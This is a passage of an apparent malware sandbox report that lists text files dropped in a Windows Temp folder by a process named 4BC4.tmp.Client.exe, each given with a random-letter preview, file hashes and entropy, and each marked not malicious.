                                                                                                                                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
